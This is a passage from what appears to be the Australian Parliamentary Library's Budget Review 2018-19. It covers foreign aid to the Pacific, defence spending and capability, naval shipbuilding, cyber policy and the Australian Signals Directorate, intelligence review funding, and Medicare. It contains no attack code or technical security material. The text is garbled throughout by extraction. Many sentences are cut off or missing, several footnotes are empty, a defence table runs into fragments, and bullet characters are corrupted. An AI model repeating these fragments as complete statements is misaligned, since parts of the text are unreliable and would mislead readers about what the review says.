by Southeast Asia, including India, North Asia and the United States’, p. 1. 358. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.8, op. cit., p. 15. 359. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.8, op. cit., p. 13; DFAT, 2017 Foreign policy white paper, op. cit., p. 3. 360. DFAT, 2017 Foreign policy white paper, op. cit., p. 103. 361. C Hill, ‘China’s policing assistance in the Pacific: a new era?’, FlagPost, Parliamentary Library blog, 6 April 2018. 362. S Morrison (Treasurer) and M Cormann (Minister for Finance), Mid-year economic and fiscal outlook 2017-18, p. 153. 363. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.4A: Defence Portfolio, pp. 117-18. 364. Department of the Prime Minister and Cabinet, ASEAN-Australia Special Summit initiatives, ASEAN-Australia Special Summit
2018 website. 365. People’s Republic of China, Full text of the Vision for Maritime Cooperation under the Belt and Road Initiative, State Council website, June 2017.
Budget Review 2018-19 71
More than $50.3 million is being provided over four years to fund Australia’s participation in a Dutch national prosecution of those responsible for bringing down Malaysia Airlines flight MH17.366
Over the next two years Australia’s total Official Development Assistance (ODA) will increase slightly in nominal terms, rising from an adjusted estimate of $4.077 billion in 2017-18 to around $4.161 billion in 2018-19 and $4.170 billion in 2019-2020.367 Over the forward estimates, however, aid will be subject to real cuts totalling $141 million as the Government extends a previous funding cap of $4 billion to 2021-22.368 Australia’s ODA as a proportion of Gross National Income is expected to fall to 0.19 per cent by 2021-22, its lowest recorded level.369 While the new cuts are significant, they amount to less than the $400 million reduction reportedly considered prior to the Budget.370
Much of the increase in this year’s funding will be used to finance the ODA-eligible portion of Australia’s contribution to the China-led Asian Infrastructure Investment Bank ($161 million in 2018-19).371 Cuts in aid to Indonesia ($30 million) and Cambodia ($6 million) will help meet the costs of building undersea communications cables for Papua New Guinea and the Solomon Islands.372 Australia committed to co-finance this initiative following reports of national security concerns surrounding the involvement of the Chinese telecommunications company, Huawei, in the Solomon Islands project.373 The Government has not published the costs of this initiative in the
budget papers.374 One estimate puts the cost at around $200 million, and completion is reportedly expected within two years.375
In line with the broader focus on the Pacific, Australia’s total aid to this region is expected to increase to $1.283 billion in 2018-19. The Government has described this as ‘our largest ever contribution’.376 In real terms, aid to the Pacific will be slightly higher than in 2014-15, the Coalition’s first budget (see Table 1). Australia’s assistance will include the new Australia Pacific Security College, and increased support for new Pacific labour mobility initiatives.377
366. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.8, op. cit., p. 18. For background, see:, 20 September 2017.
367. DFAT, Australian aid budget summary, 2018-19, Australian Government, 8 May 2018, pp. 11, 126. 368. Australian Government, Portfolio budget statements 2018-19: budget related paper no.1.9, op. cit., p. 18. 369. Development Policy Centre, Australian aid tracker: trends, Australian National University website. 370. M Watt, ‘The Turnbull government is mulling more cuts to overseas aid’, Sydney Morning Herald (online), 28 March 2018. 371. DFAT, Aid budget summary, op. cit., p. 9. 372. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.8, op. cit., p. 18; DFAT, Aid budget
summary, op. cit., p. 7. 373. DFAT, Aid budget summary, op. cit., p. 8. 374. ABC News, ‘Undersea cable deal with PNG inked amid concerns over Chinese influence in the Pacific’, ABC News (online), 14 November 2017. 375. C Graue, ‘Budget 2018: Australia to pay for new high-speed internet cable for PNG and Solomons using aid funds’, ABC News
(online), 6 May 2018; C Graue, ‘“Not a good look”: calls for transparency after Liberal Party donor wins Pacific cable contract’, ABC News (online), 8 May 2018. 376. J Bishop (Minister for Foreign Affairs) and S Ciobo (Minister for Trade, Tourism and Investment), 2018 Foreign Affairs and Trade, Tourism and Investment budget, media release, 8 May 2018. 377. DFAT, Aid budget summary, op. cit., p. 35.
Budget Review 2018-19 72
Table 1: total Australian ODA, 2014-15 and 2018-19 (A$,’000)
Region 2014-15 (a) 2018-19 (est.) (b) Real change (%) (c)
PNG and the Pacific 1 160 269 1 283 600 +2.9
Global 1 567 397 1 301 200 -22.8
East/Southeast Asia 1 358 646 1 027 200 -29.7
Middle East and Africa 387 589 258 500 -38.0
South and West Asia 475 338 284 800 -44.3
Latin America and the Caribbean 23 873 5 900 -77.0
Sources: (a) DFAT, Australia’s International Development Assistance: statistical summary 2014-15, Australian Government, 2016, pp. 5-6; (b) DFAT, Australian aid budget summary, 2018-19, Australian Government, May 2017, pp. 10-11; (c) Parliamentary Library calculation: real conversion based on CPI for 2014-15 to 2016-17 and Budget 2018-19 CPI forecasts for 2017-18 and 2018- 19.
Humanitarian aid will rise slightly, from $400 million to $410 million, as the Government moves to implement a commitment to increase overall spending in this area to $500 million per annum.378
Non-government organisations have criticised the Government’s application of new aid cuts, noting that the decision ‘puts us in a similar category to Greece and Hungary’.379 The Labor Opposition has described the cuts as an ‘international embarrassment’, contrasting the Government’s approach with the decision by New Zealand to increase ODA by 30 per cent over the next four years.380
There are broader questions as to whether Australia can remain a ‘partner of choice’ for its developing country neighbours while the aid budget continues on a downward trajectory in real terms. The 2017 White Paper describes a more competitive Indo-Pacific and some have argued that aid—alongside more traditional forms of power—will play a prominent role in intensifying contests for regional influence.381 These issues will attract further scrutiny in the months ahead as the Government undertakes its first ever review of Australia’s ‘soft power’ capabilities, and as a parliamentary inquiry into the ‘strategic effectiveness and outcomes of Australia’s aid to the Indo-Pacific’ commences.382
378. Ibid., p. v. 379. Australian Council for International Development (ACFID), ACFID analysis of the 2018-19 Budget, 8 May 2018, p. 3. 380. P Wong (Shadow Minister for Foreign Affairs) and C Moore (Shadow Minister for International Development and the Pacific), Aid cut again as Turnbull ignores wake up call, media release, 9 May 2018. 381. A Grigg and L Murray, ‘Defence establishment frowns on proposed Australian aid cuts’, Australian Financial Review (online),
6 April 2018. 382. DFAT, 2017 Foreign policy white paper, op. cit., p. 107; Joint Standing Committee on Foreign Affairs, Defence and Trade, Inquiry into the strategic effectiveness and outcomes of Australia’s aid program in the Indo-Pacific and its role in supporting
our regional interests, Parliament of Australia website.
Budget Review 2018-19 73
Defence budget overview David.383.384 The PBS figures represent total Defence funding minus own-source revenue.385
$ billion 2017-18 2018-19 2019-20 2020-21 2021-22
2018-19 PBS 35.2 35.6 37.3 40.6 44.2
2017-18 PBS 34.7 36.0 38.7 42.0 -
2016 DWP 34.2 36.8 39.0 42.4 45.8.386 Other fluctuations in the budget forecast include $645 million additional funding for Defence operations and $244 million in foreign exchange supplementation.387
The Portfolio Budget Statement (PBS) confidently asserts that ‘the Defence budget, inclusive of the ASD, will grow to two per cent of Australia’s Gross Domestic Product by 2020-21’.388
383. M Payne (Minister for Defence) and C Pyne (Minister for Defence Industry), A safer Australia-Budget 2018-19 Defence overview, media release, 8 May 2018. 384.. 385.. 386. Portfolio budget statements 2018-19: budget related paper no. 1.4A: Defence Portfolio, op. cit., p. 20. 387. Ibid., pp. 19-20. 388. Ibid., p. 5.
Budget Review 2018-19 74
The Government’s own figures for expenditure indicate that 6.4 per cent of total government expenditure is on Defence.389
On the issue of the 2 per cent of GDP target, the Australian Strategic Policy Institute’s Marcus Hellyer has.
390
Budget measures In addition to the budget measures mentioned above, the 2018-19 PBS contains total funding for operations of $750 million.391).392.393 During November 2017 the Prime Minister stated that there were 80 ADF personnel in the Philippines.394
Australian Signals Directorate
389. Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, pp. 6-9. 390. M Hellyer, ‘2% of GDP: just a hop, skip and a jump away’, The Strategist, blog, Australian Strategic Policy Institute, 9 May 2018. 391. Portfolio budget statements 2018-19: budget related paper no. 1.4A: Defence Portfolio, op. cit., p. 21. 392. Ibid. 393. M Payne (Minister for Defence), Philippines and Australia agree to enhanced counter-terrorism cooperation, media release,
24 October 2017. 394. M Turnbull (Prime Minister), Press conference with Senator the Hon Marise Payne, Minister for Defence and the Hon Christopher Pyne MP, Minister for Defence Industry Canberra, ACT , transcript, 24 November 2017.
Budget Review 2018-19 75
function has been carried out within its own agency.395 As a result of the change, ASD gets a section of its own in the PBS, which indicates that funding for 2018-19 is $827.3 million.396’.397 It is therefore possible that this reduction in staffing is related to ASD. The 2016 Defence White Paper claimed that ‘enhancements to intelligence, space and cyber security capabilities will involve 800 new APS positions’.398 These were to be offset by reductions elsewhere, but given ASD’s need to employ specialised staff, presumably some of these positions will go to ASD.
Defence workforce The Defence APS workforce will fall from 17,800 in the current year to 16,373 in 2018-19 as a result of machinery of government changes.399 This is a change from last year’s Defence PBS which forecast Defence APS staffing to be 18,200 in 2018-19. 400.401
The total Defence workforce for 2018-19 is expected to be 76,167.402
395. Background can be found in: C Barker, Intelligence Services Amendment (Establishment of the Australian Signals Directorate) Bill 2018, Bills digest, 94, 2017-18, Parliamentary Library, Canberra, 2018. 396. Portfolio budget statements 2018-19: budget related paper no. 1.4A: Defence Portfolio, op. cit., p. 164. 397. Australian Government, Agency resourcing: budget paper no. 4: 2018-19, p. 185. 398. 2016 Defence white paper, op. cit., p. 150. 399. Portfolio budget statements 2018-19: budget related paper no. 1.4A: Defence Portfolio, op. cit., p. 24. 400. Portfolio budget statements 2017-18: budget related paper 1.4A: Defence Portfolio, op. cit., p. 20. 401. Portfolio budget statements 2018-19: budget related paper no. 1.4A: Defence Portfolio, op. cit., p. 146. 402. Ibid., p. 27.
Budget Review 2018-19 76
Defence capability Nicole Brangwin
Given the large number of defence capability announcements made since the release of the 2016 Defence White Paper in February 2016, one might be forgiven for losing track. This year’s Budget does not contain any new announcements in addition to those already made prior to the Budget, so this brief aims to take stock of progress in the ever-broadening defence capability sphere.
The pace of major defence capability announcements made by the Australian Government since the release of the 2016 Defence White Paper suggests many of the proposed capabilities outlined in the Integrated Investment Program which accompanied the White Paper have the potential to be achieved.403 Conversely, the speed at which decisions are being made on expensive, complex, long-term projects continues to raise concerns about the level of scrutiny applied by Cabinet and whether some of these projects might potentially appear on the Projects of Concern list.404
The overall cost attached to the Integrated Investment Program was originally $195 billion over ten years to 2025-26.405 This figure was revised upwards in the 2017-18 Budget to $200 billion out to 2027-28.406 The explanation for the $5 billion revision was that it reflects ‘the best available
information in respect to project planning, delivery reality, cost estimates, phasing, and other important judgments and assumptions critical to delivery of the capital investment portfolio’.407
Defence has for some time been criticised for declining transparency in its reporting of capability issues. The application of the two-pass approval process to the major capital investment program is absent from this year’s Budget and the program’s estimated budget for approved and unapproved projects is indistinguishable as both streams are lumped together under the same line item—Major Capital Investment Program over the forward estimates totals $41,106.6 million.408 Greater visibility of the unapproved Major Capital Investment Program and associated costs not only better informs an industry that is expected to ramp up to meet Defence’s strategic requirements, it also allows the Parliament to scrutinise these decisions on behalf of the public. The Australian Strategic Policy Institute has monitored the level of transparency over the years and Marcus Hellyer recently.
409
Since the release of the 2016 Defence White Paper, the Government has published a series of policies, plans and strategies with specific funding figures attached. These include the:
⢠National Shipbuilding Plan worth $90 billion in new frigates ($35 billion) offshore patrol boats ($3-4 billion) and submarines ($50 billion), over $1 billion in shipyard infrastructure
403. Australian Government, 2016 Defence white paper, Department of Defence, 25 February 2016. 404. A Davies, ‘Defence acquisition: kicking the can down the road’, Australian Strategic Policy Institute, blog, 14 February 2018; D Watt, ‘Defence budget overview’, Budget review 2017-18, Research paper series, 2017-18, Parliamentary Library, Canberra, 2017; D Watt, ‘Defence capability’, Briefing book: key issues for the 45th Parliament, Parliamentary Library,
Canberra, 2015. 405. Australian Government, 2016 Integrated Investment Program, Department of Defence, February 2016, p. 9. 406. Australian Government, Portfolio budget statements 2017-18: budget related paper no. 1.4A: Defence Portfolio, 2017, p. 117. 407. Ibid., p. 117. 408. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.4A: Defence Portfolio, 2018, p. 22. 409. M Hellyer, ‘2% of GDP: just a hop skip and a jump away’, Australian Strategic Policy Institute, blog, 9 May 2018.
Budget Review 2018-19 77
modernisation and around $25 million towards skilling and growing the workforce.410 The re-profiling of $500 million in defence expenditure to financial year 2018-19 is said to help align defence funding with projects such as the naval shipbuilding program411
⢠Defence Export Strategy establishes the Australian Defence Export Office and an Australian Defence Export Advocate position (former Defence Minister David Johnston was recently appointed to this position), and provides $3.8 billion towards a Defence Export Facility and $20 million per year to implement the strategy.412 This year’s Budget confirmed that $80 million over four years would be allocated from existing resources, including $6.3 million per year to support the work of the Defence Export Office. In addition, $4.1 million per year will be allocated to expanding the Centre for Defence Industry Capability grants program and $3.2 million to the Global Supply Chain program and413
⢠Defence Industrial Capability Plan establishes Australia’s sovereign industrial capability priorities and includes various initiatives such as the Naval Shipbuilding College (worth $62 million over three years) and $17 million towards funding the sovereign industrial capability priorities grants program.414 This year’s Budget confirms the $17 million figure over the forward estimates, totalling $68 million from existing resources.415
Defence’s Net Capital Investment primarily relates to military equipment and is expected to reach $3.8 billion in 2018-19 and continue to grow to $8 billion by 2021-22.416
Defence Cooperation Program Under the Defence Cooperation Program (DCP), Papua New Guinea (PNG) continues to receive the largest amount of funding, allocating $42.7 million in 2018-19, an increase of around $3 million from the previous Budget. The ADF is assisting the PNG military with security aspects for the upcoming APEC meeting, to be held in PNG November 2018.417
The DCP as a whole received a boost in this Budget, from $128 million in 2017-18 to $164 million in 2018-19.418 This is mainly due to the Pacific Maritime Security Program for which Western Australian company Austal has been contracted to build 21 Guardian Class patrol boats. PNG is expected to be the first recipient of the new boats in 2018.419
Major acquisitions As mentioned above, the list of projects slated for first or second pass approval (and sometimes combined) under the Integrated Investment Program has been excluded from this Budget. The Defence Annual Report 2016-17 noted that during that financial year:
…74 capability-related submissions were approved by Government against an initial plan of 62 (as given in the 2016 Defence White Paper). Fifteen of those submissions received first pass approvals, 31 received second pass approvals, 15 received other types of Integrated Investment Program project
410. Australian Government, Naval shipbuilding plan, Department of Defence, 16 May 2017, p. 80. 411. Australian Government, Budget measures: budget paper no. 2: 2018-19, 2018, p. 83. 412. Australian Government, Defence export strategy, Department of Defence, 29 January 2018, pp. 17-18. 413. Budget measures: budget paper no. 2: 2018-19, op. cit., p. 82. 414. Australian Government, Defence industrial capability plan, Department of Defence, 23 April 2018, pp. 8 and 64. 415. Budget measures: budget paper no. 2: 2018-19, op. cit., pp. 82-83. 416. Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, 2018, p. 6-48. 417. Asia-Pacific Economic Cooperation (APEC), ‘APEC 2018 Papua New Guinea’, APEC website. The Defence Portfolio Budget
Statements did not refer to APEC specifically, rather it mentioned assisting PNG with its ‘Major Event Security capabilities’. Portfolio budget statements 2018-19: Defence Portfolio, op. cit., p. 118. 418. Portfolio budget statements 2018-19: Defence Portfolio, op. cit., p. 118. 419. Ibid.
Budget Review 2018-19 78
approvals, and 13 approvals were granted for submissions that provided advice to Government on current and future capability. 420
In 2017-18, the Portfolio Budget Statements for Defence showed there had been 20 first pass approvals and 37 second pass approvals (plus two ‘other’ approvals) during that financial year.421 The Portfolio Additional Estimates Statements for 2017-18 provided a minor update showing three second pass approvals and two ‘other’ approvals (no first pass approvals were noted).422
The Projects of Concern list was last updated in February 2018 when the Government announced the Air Warfare Destroyer and the Collins Class submarine projects had been removed from the list.423 There are possibly four projects remaining, two of which are related to the OneSKY civil military air traffic management system (CMATS).424
Defence is contributing to the Airservices-led OneSKY project to develop a national CMATS. Airservices is expected to cover 57 per cent and Defence 43 per cent of the acquisition costs of $1.2 billion.425 In the Budget, the Defence approved project expenditure component for phase 3 is listed as $974 million, substantially more than 43 per cent of the total cost.426 This possibly accounts for the Government’s approval of an additional $243 million earlier this year.427 As the agreement between all parties to the project was only signed in February 2018, following protracted negotiations, Defence has so far spent $155 million and another $116 million is earmarked for 2018-19.428 This project is still on the Projects of Concern list but is expected to be reviewed in light of recent progress.429
Naval shipbuilding In February 2016, the Defence White Paper confirmed that Australia would acquire 12 conventional submarines to replace the Collins Class submarines (which cost over $500 million per year to sustain).430 In April 2016, DCNS (now Naval Group) from France was selected as the preferred international design partner for Australia’s Future Submarine program.431 The successful design is the Shortfin Barracuda Block 1A.432 Overall investment in the ‘rolling acquisition’ program is worth $50 billion.433 In this year’s Budget, the Future Submarine Program is at phase 1B with an approved budget of $2.2 billion.434 The most recent announcement about Defence’s most ambitious acquisition was made on 3 May 2018 and stated that the critical design work will be moved from France to South Australia from 2022. Initial design work is ongoing.435
420. Australian Government, Annual report 16-17, Department of Defence, p. 123. 421. Portfolio budget statements 2017-18: Defence Portfolio, op. cit., pp. 117-119. 422. Australian Government, Portfolio Additional Estimates Statements 2017-18: Defence Portfolio, 2018, p. 85. 423. M Payne (Minister for Defence) and C Pyne (Minister for Defence Industry), Air Warfare Destroyer project removed from
projects of concern list, media release, 1 February 2018. 424. Department of Defence (DoD), ‘Projects of Concern update’, DoD website. 425. Senate Rural and Regional Affairs and Transport Legislation Committee, Official committee Hansard, 26 February 2018,
p. 109.
426. Portfolio budget statements 2017-18: Defence Portfolio, op. cit., p. 125. 427. Senate Foreign Affairs Defence and Trade Legislation Committee, Official committee Hansard, 28 February 2018, p. 75. 428. Portfolio budget statements 2018-19, Defence Portfolio, op. cit., p. 125. 429. Joint Standing Committee on Foreign Affairs, Defence and Trade, Official committee Hansard, 4 May 2018, p. 38.
430. Australian Government, 2016 Defence white paper, op. cit., p. 90. 431. M Turnbull (Prime Minister) and M Payne (Minister for Defence), ‘Future submarine program’, press release, 26 April 2016. 432. Naval Group, ‘The Shortfin Barracuda Block 1A’, Naval Group website. 433. M Turnbull (Prime Minister) and M Payne (Minister for Defence), ‘Future submarine program’, op. cit. 434. Portfolio budget statements 2018-19, Defence Portfolio, op. cit., p. 129. 435. M Turnbull (Prime Minister), M Payne (Minister for Defence) and C Pyne (Minister for Defence Industry), ‘Submarine design
to move to Australia’, media release, 3 May 2018.
Budget Review 2018-19 79
The Budget also notes that a decision on the Future Frigate program is expected before the middle of 2018 and the Offshore Patrol Vessels are to commence construction in 2018 as per the Naval Shipbuilding Plan.436
436. Portfolio budget statements 2018-19, Defence Portfolio, op. cit., p. 130.
Budget Review 2018-19 80
Cyber policy Hel’.437’.438 Minister Dutton foreshadowed the prevention of cybercrime and cyberattack and the promotion of ‘cyber resilience’ as core objectives of the new Home Affairs portfolio, which now has carriage of the Government’s 2016 Cyber Security Strategy (the Strategy).439 The Home Affairs 2018-19 Portfolio Budget Statements stipulate the performance criterion for the relevant programs involved in providing ‘timely, relevant and forward leaning cyber security policy advice, to protect and advance Australia’s interests online’.440.441 Despite the lack of detail on whether the Government is on track to achieve those goals, this year’s Budget does contain a number of measures that relate to the implementation of that action plan—and not only in the Home Affairs portfolio.442 Budget measures that explicitly mention cybersecurity outcomes span the Foreign Affairs and Trade, Health and Jobs and Innovation portfolios.443.444 Additionally, there are measures targeting criminal behaviour online, as well as abuse that falls short of the criminal threshold.445
437. J Bishop (Minister for Foreign Affairs), Keynote speech at the 2018 Safeguarding Australia National Security Annual Summit, Canberra, media release, 9 May 2018. 438.. 439. Australian Government, Portfolio additional estimates statements 2017-18: Home Affair’s Portfolio, p. 25; P Dutton (Minister for Home Affairs), Address to the National Press Club, Canberra, op. cit. 440. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.10: Home Affairs portfolio, p. 40. 441. N Brangwin, ‘Cybersecurity’, Budget review 2016-17, Research paper series, 2015-16, Parliamentary Library, Canberra, 2016. 442.. 443.). 444.. 445.,
Budget Review 2018-19 81
The distribution across portfolios, however, reflects the ‘[increasing reliance] on the internet in many aspects of our society and economy’ that the Minister for Foreign Affairs mentioned in her address on 9 May 2018.446.447
The critical role of the Australian Signals Directorate Legislation to establish the Australian Signals Directorate (ASD) as a statutory agency while remaining within the Defence portfolio will come into effect on 1 July 2018. The Defence Portfolio Budget Statements state that there are no budget measures relating to ASD.448 But the ASD will adopt formal responsibility for the Australian Cyber Security Centre (ACSC) from the beginning of the 2018-19 financial year,449 together with:
⢠the Computer Emergency Response Team along with its cyber policy and security functions, which is being transferred from the Attorney-General’s Department450
⢠the 24/7 cyber incident monitoring and response capability announced in the Mid-Year Economic and Fiscal Outlook 2017-18451 and
⢠the Cyber Security Unit, including its personnel, that formed inside the Digital Transformation Agency as a consequence of the Review of the Events Surrounding the 2016 eCensus.452.453. 446. Bishop, op. cit. 447.. 448. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.4A: Defence Portfolio, p. 165. See also D Watt, ‘Defence overview’, Budget review 2018-19, Research paper series, 2017-18, Parliamentary Library, Canberra, 2018. 449.. 450. Explanatory Memorandum, Intelligence Services Amendment (Establishment of the Australian Signals Directorate) Bill 2018. 451. S Morrison (Treasurer) and M Cormann (Minister for Finance), Mid-year economic and fiscal outlook 2017-18, p. 175. 452.. 453. Australian National Audit Office, Review of cyber security: report by the Independent Auditor, Commonwealth of Australia, December 2017.
Budget Review 2018-19 82
Cyber as a frontier for Parliament The impact of cyberspace on parliamentary business is also contemplated in the Budget, and parliamentary interest in cyber affairs is apparent in the terms of reference for current committee inquiries.454 Ongoing parliamentary business includes:
⢠the Joint Committee on Law Enforcement’s inquiry into the impact of new and emerging
information and communications technology
⢠the Senate Standing Committee on Finance and Public Administration’s inquiry into digital delivery of government services and
⢠the Joint Standing Committee on Trade and Investment Growth’s inquiry into the trade system and the digital economy.
On 8 May 2018, the House of Representatives Standing Committee on Industry, Innovation, Science and Resources tabled the report, Internet Competition Inquiry, which considered the impact on local businesses in Australia of global internet-based competition.
454. The Department of Parliamentary Services was allocated $9 million over four years to establish a Cyber Security Operations Centre for Parliament House: Budget measures: budget paper no. 2: 2018-19, p. 162.
Budget Review 2018-19 83
National security overview Cat).455
2017 Independent Intelligence Review (the Review) The most recent independent review of the Australian Intelligence Community (AIC) was completed in June 2017, with a public version of the report released in July 2017.456 The reviewers made 23 recommendations relating to structural arrangements, capability and resourcing, legislation, and oversight.457)).458
The Government has not released a formal response to the Review, but stated when it released the report that it accepted the recommendations ‘as a sound basis to reform Australia’s intelligence arrangements’, and has been progressively implementing them.459
The Mid-Year Economic and Fiscal Outlook 2017-18 included $154.5 million over five years to:460
⢠establish the Office of National Intelligence (ONI) in the Prime Minister and Cabinet portfolio ($118.5 million). One of the Review’s most significant recommendations was the replacement of the ONA with the ONI, led by a Director-General who would be the head of the NIC and the Prime Minister’s principal adviser on intelligence community issues. The ONI would have a leadership and coordination role across the NIC, including advising the Government on
455. C Barker, ‘National security overview’, Budget review 2017-18, Research paper series, 2016-17, Parliamentary Library, Canberra, 2017. 456. Department of the Prime Minister and Cabinet (PM&C), 2017 Independent Intelligence Review, Commonwealth of Australia, Canberra, June 2017. The reviewers were Michael L’Estrange and Stephen Merchant, with Sir Iain Lobban acting as an
adviser.
457. For a summary of recommendations, see: Ibid., pp. 13-22. 458. Ibid., pp. 46-48. 459.. 460. S Morrison (Treasurer) and M Cormann (Minister for Finance), Mid-year economic and fiscal outlook 2017-18, p. 175.
Budget Review 2018-19 84
intelligence collection and assessment priorities and the appointment of senior NIC office-holders, and the evaluation of NIC agencies461
⢠fund a ‘24/7 cyber incident monitoring and response capability’ in the Australian Cyber Security Centre ($33.6 million) and462
⢠fund additional secondments from ASIO to the Australian Government Security Vetting Agency (AGSVA) ($2.4 million). The Review noted that the time taken for AGSVA to complete Top Secret (Positive Vetting) security clearances was ‘exacerbating the intelligence community’s existing workforce challenges’. It recommended funding for additional ASIO secondments to AGSVA as soon as possible, and a review of the situation in early 2018, with alternative options to be explored if the existing remediation efforts had not resulted in processing times being reduced to six months or less.463).464
The Budget includes additional funding for implementation of the Review’s recommendations. The total amount is marked as not-for-publication on national security grounds, and will be spread across ‘various agencies’.465 However, included in the total is:
⢠$52.1 million for the IGIS’s increased oversight functions (already included in the forward estimates). The Review recommended that the IGIS’s jurisdiction be expanded to include AUSTRAC and the intelligence functions of the AFP, ACIC and what is now the DoHA, and that the IGIS be given additional resources to enable it to sustain a full-time staff of around 50.466 The PAES indicate that the funding includes increasing staffing from 17 to 55 FTE, as well as ‘commercial rent, IT systems and secure fit-out costs of new premises’467
⢠$18.1 million for AGD and OPC to undertake a comprehensive review of the legal framework governing NIC agencies and related oversight bodies (already included in the forward estimates). The Review recommended that this be undertaken by ‘an eminent and suitably qualified individual or number of individuals, supported by a small team of security and intelligence law experts with operational knowledge of the workings of the intelligence community’. It also recommended some specific amendments that could be progressed while the comprehensive review took place and468
⢠an unspecified amount to establish a Joint Capability Fund (JCF) for the NIC. The Review recommended that a JCF be established to finance NIC cross-agency projects, including an NIC Innovation Fund, NIC Innovation Hub and an NIC Science and Technology Advisory Board. It recommended the total amount in the JCF be equivalent to the Efficiency Dividend levied on AIC agencies and the intelligence functions of other NIC agencies.469 The Review estimated that if its recommendations about the application of the Efficiency Dividend to NIC agencies were
461..
462. See: Ibid., p. 65 (part of Recommendation 3). 463. Ibid., pp. 77-78 (Recommendation 12). 464. Australian Government, Portfolio additional estimates statements 2017-18: Prime Minister and Cabinet portfolio, pp. 33, 35; Australian Government, Portfolio additional estimates statements 2017-18: Attorney-General’s portfolio, pp. 9, 13-15, 98.
465. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 163. 466. PM&C, 2017 Independent Intelligence Review, op. cit., pp. 115-118 (Recommendations 21 and 22). 467. Australian Government, Portfolio additional estimates statements 2017-18: Prime Minister and Cabinet portfolio, p. 33. 468. PM&C, 2017 Independent Intelligence Review, op. cit., pp. 89-110 (Recommendations 15-20). 469. Ibid., pp. 82-85 (Recommendation 7).
Budget Review 2018-19 85
adopted, that the JCF would accumulate around $370.0 million over the five years from 2017-18.470
Other national security funding The Budget also includes $24.4 million of additional funding for ASIO, and undisclosed amounts for ASIS (over two years from 2018-19) and ACIC (over five years from 2017-18) ‘to meet the Government’s national security objectives’.471’.472
470.). 471. Australian Government, Budget measures: budget paper no. 2: 2018-19, pp. 103, 131. 472. S Morrison (Treasurer) and M Cormann (Minister for Finance), Mid-year economic and fiscal outlook 2017-18, pp. 153-154.
Budget Review 2018-19 86
Medicare and hospital funding Amanda Biggs
Medicare The Government has announced a number of measures relating to Medicare in this Budget. Expenditure on Medicare is estimated to be $24.1 billion in 2018-19, an increase in real terms of 1.1 per cent on 2017-18.473 Funding for Medicare is now through a special account, the Medicare Guarantee Fund, which was established as a result of last year’s Budget.474
New Medicare Benefits Schedule listings A number of new and amended listings will be added to the Medicare Benefits Schedule (MBS) as a result of recommendations made by the independent Medical Services Advisory Council (MSAC). Among the new items to be funded are:
⢠a new pathology test for patients with a cystic fibrosis gene mutation
⢠treatment for patients with idiopathic (of unknown cause) overactive bladder
⢠magnetic resonance imaging (MRI) prostate scans for diagnosing prostate cancer and for monitoring diagnosed patients.475
The total cost over four years from 2018-19 is estimated to be $25.4 million.476.477 Net savings of $189.7 million from the Review have been ‘re-invested by the Government in Medicare’.478 Recently, the Chair of the Taskforce announced that the Government had accepted 38 of its most recent recommendations which included a number of additions and amendments to the MBS.479 New items to be funded include:
⢠renal medicine items to support dialysis services in rural and remote regions, which will improve access for Aboriginal and Torres Strait Islander people with kidney disease. Aboriginal and Torres Strait Islander people experience kidney disease at 7.3 times the rate of other Australians480
⢠three dimensional (3D) breast tomosynthesis—a form of high resolution imaging for breast cancer detection.
Amendments include restricting GP referrals for some MRI scans for knees, and restructuring the schedule for spinal surgery services.481
473. Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, p. 6-19. 474. The Medicare Guarantee Act 2017 received Royal Assent on 26 June 2017. 475. Department of Health (DoH), ‘Guaranteeing Medicare - Medicare Benefits Schedule - new and amended listings’, Budget 2018-19 Fact Sheet, 8 May 2018.
476. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 109. 477. DoH, ‘Healthier Medicare - removing obsolete services from the Medicare Benefits Schedule’, Budget 2016-17 Fact Sheet, 3 May 2016. 478. Budget measures: budget paper no. 2: 2018-19, p. 110. 479. B Robinson (Chair of the MBS Review Taskforce), ‘Latest recommendations accepted by Government’, media release, 29 April
2018.
480. DoH, ‘Indigenous Health - investment in remote renal services and infrastructure’, Budget 2018-19 Fact Sheet, 8 May 2018. 481. DoH, ‘Guaranteeing Medicare -Medicare Benefits Schedule Review - response to Taskforce recommendations’, Budget 2018-19 Fact Sheet, 8 May 2018.
Budget Review 2018-19 87
New listings and amendments to the MBS do not require legislation, but are enacted through legislative instrument.
Modernising the health and aged care payments system Last year’s Budget included funding of $67.3 million (over one year) to modernise the health and aged care payments ICT systems. This budget includes an additional $106.8 million over four years to progress this work.482
Low income thresholds.483 The cost to the Budget over the forward estimates is $230.0 million. These threshold adjustments will require legislation.
Medicare levy As expected, the Budget confirmed that the Government will not proceed with the planned 0.5 percentage point increase to the Medicare levy which was to be used to help fund the National Disability Insurance Scheme (NDIS).484 The levy will remain at 2.0 per cent. The implications of this decision are briefly discussed in the Library Flagpost article, ‘‘Fighting for funding’: where to next for the NDIS?’.485
Compliance $9.5 million over five years from 2017-18 is provided to improve compliance and debt recovery arrangements for doctors. The measure includes ‘better targeting investigations into fraud, inappropriate practice and incorrect claiming’.486 Legislation will be introduced to support these measures.487
Stakeholder reaction Stakeholder reaction to individual Medicare measures has varied. For example, the Australian Healthcare and Hospitals Association (AHHA) welcomed the continuing work of the MBS Review Taskforce488 and the Consumers Health Forum welcomed the ‘additional funding for hospitals, Medicare, aged care and medicines’.489 However, some in the diagnostic imaging sector have criticised the government for failing to immediately end the freeze on indexation of diagnostic imaging fees, and for restricting GP-referred MRI scans on knees.490 A number of disability and social sector stakeholders have expressed disappointment over the decision to not proceed with the Medicare levy increase.491
482. Budget measures: budget paper no. 2: 2018-19, pp. 110-111. 483. Ibid., p. 32. 484. Ibid. 485. L Buckmaster, ’Fighting for funding’: where to next for the NDIS?’, FlagPost, Parliamentary Library blog, 27 April 2018. 486. Budget measures: budget paper no. 2: 2018-19, p.109. 487. DoH, ‘Guaranteeing Medicare - improving safety and quality through stronger compliance’, Budget 2018-19 Fact Sheet,
